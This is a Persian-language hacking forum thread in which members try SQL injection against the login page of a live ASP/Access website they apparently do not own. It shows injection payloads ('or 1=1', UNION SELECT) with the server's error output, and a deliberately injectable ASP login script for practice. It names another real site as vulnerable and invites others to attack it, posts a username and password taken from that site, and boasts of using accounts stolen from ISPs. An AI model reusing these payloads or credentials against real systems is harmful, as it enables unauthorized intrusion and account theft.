اطلاعیه

Collapse
No announcement yet.

Sql Injection

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • Sql Injection

    Ba salam:
    Bad az test safe ye login yek site fahmidam ke dar moghabele sql injection asib pazir ast.

    Data basi ke estefade mikonad Access mibashad.

    man in code ra inject kardam :
    ' or 1=1 --
    ' or '1'=1' --
    va ba payame zir movajeh shodam:
    HTTP 500.100 - Internal Server Error - ASP error
    Internet Information Services

    --------------------------------------------------------------------------------

    Technical Information (for support personnel)

    Error Type:
    Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
    [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'TAC_ID = '' or 1=1 --' AND TAC_Attr = '[Global]Passwd''.
    /asp/pass/login.asp, line 36


    Browser Type:
    Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)

    Page:
    POST 42 bytes to /asp/pass/login.asp

    POST Data:
    username=%27+or+1%3D1+--&password=&login=1

    --------------------------
    1:Mikhastam bebinam ke escape charecter dar ODBC Microsoft Access Driver che chiz mibashad?(-- kar nemikonad)
    albate bad az inke syntax dorost ra vared mi****m (Yani tartib ' ha ra reayat mi****m ba payam access denied robero mishavim.)
    2:Aya matalebe khobi dar morede sql injection soragh darid?
    mer3000000000000
    گذشت و سرافرازي را از درخت آموز که حتي سايه از هيزم شکن برنمي دارد.
    حتي اگر در مسير درست راه برويد اگر آنجا بنشينيد از رويتان عبور خواهند كرد .

    There are only 10 types of people in this world
    those who understand binary, and those who don't

  • #2
    Salam Doste khob...

    Dar bareye Sql Injection... ..

    AKSARE site ha az firewall estefade mikonanad keh bazi character ha filter mishan.. in 2 ta hosn dare/..

    aghe barnamee be khater Code nevisi badesh Ejazeye ye soee estefadaro be ye hacker bede.. service dahande ba in moshkel az kar nayofte aksare erorr 500 HTTP ( ya firewalle ya on noskhe Patch shode !!)

    va rajebe in Access denied ham begham.. ono admin site user dast rasisho karde Admin site yani shoma nemitone ta zamani keh ba user admin be site login **** ejazeye dast rasi be on file ro nadari !!!

    aghe emkan dare Linkesho bede.. neghash konam shayat ye rahe behtar pishnahad konam..
    http://blxk.shabgard.org

    Comment


    • #3
      Dost aziz javabi ra ke neveshteh bodid khandam.

      Montaha shoma tavajoh nakardid ke peygham khatayee ke tolid shode in ra miresanad ke in server exploitable ast.

      Payami ke in server ferstade mostaghiman az odbc access sql mibashad.
      Ba tavajoh be kodhaye dade shode va javab mitavan fahmid ke server as nttacplus estefade mikonad.
      Agar ba in narmafzar kar karde bashid midanid ke data base an access mibashad.

      Ok I found MY answer some where else ..........

      Thanks for your answers.
      گذشت و سرافرازي را از درخت آموز که حتي سايه از هيزم شکن برنمي دارد.
      حتي اگر در مسير درست راه برويد اگر آنجا بنشينيد از رويتان عبور خواهند كرد .

      There are only 10 types of people in this world
      those who understand binary, and those who don't

      Comment


      • #4
        Bazam Salam.

        bashe baba ghahr nakon barat ye Sql injection mizaram hade aghal ono bekhon !!! wali bazam migham HTTP 500 didi (bikhiyal mishi...) yani az ghable service dahande fekresho karde !!! yani farghi nemikone user domain ghereande chee nasb karde va chee moshkeli dare !!!



        Wali behar hal..

        injaro ye sar bebinin harfaye khobi Dare !!!
        :D

        http://dbforums.com/arch/66/2003/4/547906



        Link ro aghe khasti midi mibini mishe ya nemishe !!!
        http://blxk.shabgard.org

        Comment


        • #5
          http://dbforums.com/arch/66/2003/4 in yadam raft ino neghash kon!!!


          Wali bazam migham !!! tori nemishe:cool: :D
          http://blxk.shabgard.org

          Comment


          • #6
            Bashe... hala !!!

            barat ye manual kamel Sql injection midam ta dide behtari dashte basheee !!! chee ****m !!!:D

            http://www.nextgenss.com/papers/adva..._injection.pdf

            Wali pishe khodemon bashe.. ( admin jan User khobiye in agha man dost dashtam Ozve gold bedin !! )

            Partit misham bebinam admin chee mighe !!:D
            http://blxk.shabgard.org

            Comment


            • #7
              Ba salam mojadad

              Rast ghofti kheili be hem bar khord .baba nimidonam Chikar bayad be****m ta ma ro Beginner Be hesab nayarand .!

              Baz ham tashakkor mikonam az bl2k aziz .
              Rastesho be khaye man ta hala pool ziyadi baraye ozv shodan dar site ha nadam (Aslan bavar mi****d to in 3 4 sal faghat chand ta eshterak interneti poolaki gereftam?

              aksare oghat az account hayee ke az isp haye mokhtalef kesh raftam be internet vasl shodam )
              Alan ham hamin tor (Hal nadaram proxy mo avaz konam bebakhshid Lotfan trace ham na****d (loged ip) ! ! !)

              Dar morede ozv shodan dar site ham yek bar ba admin sohbat kardam.
              Dost dashtam ba ersal maghalate amouzeshi dar ye ghesmat az site ke fekr mikonam hanooz ham ra nayoftade ozve site mishodam vali admin aslan javabe email amo nadad ! !)

              Ye chize dige ham bayad begam (Albate haml bar ghoror va badabi nashe!)
              Man taghriban 1 mah pish ozve hamin site dbforums shodeam ba hamin id r00tless!

              rastesho bekhayad ziayd forsat nadashtam ke az in site estefade konam.

              Baz ham mer3000000000 bl2k .

              Emroz maili ba mozo e zir az shabgard daryaft kardam :
              Be admin haye ISP ha user majani tallogh migrad!
              Pas ma hakerhaye Moshtagh che tor?

              Mer3000000000000000000000000000000
              گذشت و سرافرازي را از درخت آموز که حتي سايه از هيزم شکن برنمي دارد.
              حتي اگر در مسير درست راه برويد اگر آنجا بنشينيد از رويتان عبور خواهند كرد .

              There are only 10 types of people in this world
              those who understand binary, and those who don't

              Comment


              • #8
                bl2k jan va rootless aziz
                man ham hamin error ro migiram bl2k jan,site dar moghabele SQL asib pazire amma....
                hala age doost dashty ye negah bendaz plz(100 ta soorakhe dige ham haminja peyda mishe;))
                amma man dar bareye sql sohbat mikonam
                www.mehran-co.com
                nazareto bede plz:d
                @ rootless:
                Rootless jan,, ta oonja ke midoonam ADMIN oonghadr ke be mataleb va doostane team ahamiat mide be poole ye eshterak ahamyat nemide,,pas enshallah shoma ro too forum e aaza mibinim:X:x

                Comment


                • #9
                  bl2k aziz ye chizi yadam rafte :

                  Agar Khataye ma 500 bashad shoma dorost ghofteid valy
                  Ba tavajo be morede zir ke 500.100 (Internal Server Error - ASP error
                  Internet Information Services
                  )
                  Mibashad bayad ghoft ke site asib pazir ast!

                  Ye chiz e digar man khodam codi neveshte boodam shabihe hamin va roye computere khodam emtehan kardam(Albate ghabl az avalin post) :

                  Code be sorate zir ast:

                  <%
                  dim user
                  dim password
                  user=Request.QueryString("user")
                  password=Request.QueryString("password")

                  filePath = Server.MapPath("NTTacDB.mdb")

                  'Define The Db & The path with the engine!
                  set conn=Server.CreateObject ("adodb.connection")


                  'The time out command
                  conn.CommandTimeout=30


                  'here is the path
                  Conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & filePath

                  'building the record set
                  set rs=Server.CreateObject("ADODB.recordset")
                  '-------------------------------------------------
                  'The SQL Command goes here!

                  rs.Open "Select * from tac_usr where TAC_ID = '"& user &"' and TAC_Attr ='[Global]Passwd' and TAC_VAL='" & password & "' ",conn
                  if rs.BOF=true or rs.EOF=true then
                  response.Write ("Invalid username!")

                  else
                  response.Write("Yahoo! You are right!!!")

                  end if

                  '------------------------------------------------
                  ' Cheking if there is any connection or not
                  if rs.State=1 then
                  rs.Close
                  end if
                  %>
                  In code baraye khandan az db nttacplus (Besorete kheili simple ) neveshte shode:

                  in code ra roye computeret emtehan kon bebin kodom khata ro migri?

                  500.100 ya 500?

                  (Albate hein neveshten Ye chiz be zehnam resid!)

                  (Fekr konam rast migi in khata be ellat ghalat bodan syntax injection ast.)

                  Ok anyway !

                  Montazer hastam!
                  گذشت و سرافرازي را از درخت آموز که حتي سايه از هيزم شکن برنمي دارد.
                  حتي اگر در مسير درست راه برويد اگر آنجا بنشينيد از رويتان عبور خواهند كرد .

                  There are only 10 types of people in this world
                  those who understand binary, and those who don't

                  Comment


                  • #10


                    chashm ghorban...

                    Az man be admin... agha dighe in bare akhare in User ro mi**** Gold ya dargheer mishim :D :p
                    http://blxk.shabgard.org

                    Comment


                    • #11
                      Bl2k Aya ba union select kar kardi aziz?

                      bebin to codi ke neveshtam chera in khata ro daryaft mikonam :

                      Error Type:
                      Microsoft JET Database Engine (0x80004005)
                      Syntax error in FROM clause.

                      vaghti in code ra baraye injection entekhab kardam?

                      .../login.asp?user=10 ' union select top 1 table_name from information_schema.tables

                      does access data base supports information_schema ?
                      گذشت و سرافرازي را از درخت آموز که حتي سايه از هيزم شکن برنمي دارد.
                      حتي اگر در مسير درست راه برويد اگر آنجا بنشينيد از رويتان عبور خواهند كرد .

                      There are only 10 types of people in this world
                      those who understand binary, and those who don't

                      Comment


                      • #12
                        on Addresse keh dostemon dadan...

                        ye user : 1234
                        pass : zzz

                        dasht...

                        rasti inja accountesh Active ya sare kari?:confused:

                        sare forsat neghah mikonam...
                        http://blxk.shabgard.org

                        Comment


                        • #13
                          Agar code zir ra niz vared ****m ba in khata robero mishavim(Albate dar computer man ke windows 2000 advancedto partition h nasb shde!)

                          .../login.asp?password= a ' union select top 1 table_name from information_schema.tables

                          error :

                          Could not find file 'H:\WINNT\system32\information_schema.mdb'.
                          گذشت و سرافرازي را از درخت آموز که حتي سايه از هيزم شکن برنمي دارد.
                          حتي اگر در مسير درست راه برويد اگر آنجا بنشينيد از رويتان عبور خواهند كرد .

                          There are only 10 types of people in this world
                          those who understand binary, and those who don't

                          Comment


                          • #14
                            Adminjan Dast marizad!
                            Kheili mochakkeram ke ba darkhast man Movafeghat karadid.
                            Az bl2k aziz niz nahayate tashakkor ra daram!

                            Baz ham mamnoon.
                            Omidvaram ozve khobi basham.
                            گذشت و سرافرازي را از درخت آموز که حتي سايه از هيزم شکن برنمي دارد.
                            حتي اگر در مسير درست راه برويد اگر آنجا بنشينيد از رويتان عبور خواهند كرد .

                            There are only 10 types of people in this world
                            those who understand binary, and those who don't

                            Comment


                            • #15
                              Rasti admin chand rooze nist...

                              shayad be on khatere.. sabr dashte bash..

                              Admin jan pesare khobiye...

                              motmaennam nadide.. onjam sar nazade,,

                              Rasti har moshkeli dasht az har lahaz begho man inja betonam Linkee chizi khasti barat midam..

                              http://blxk.shabgard.org

                              Comment

                              Working...
                              X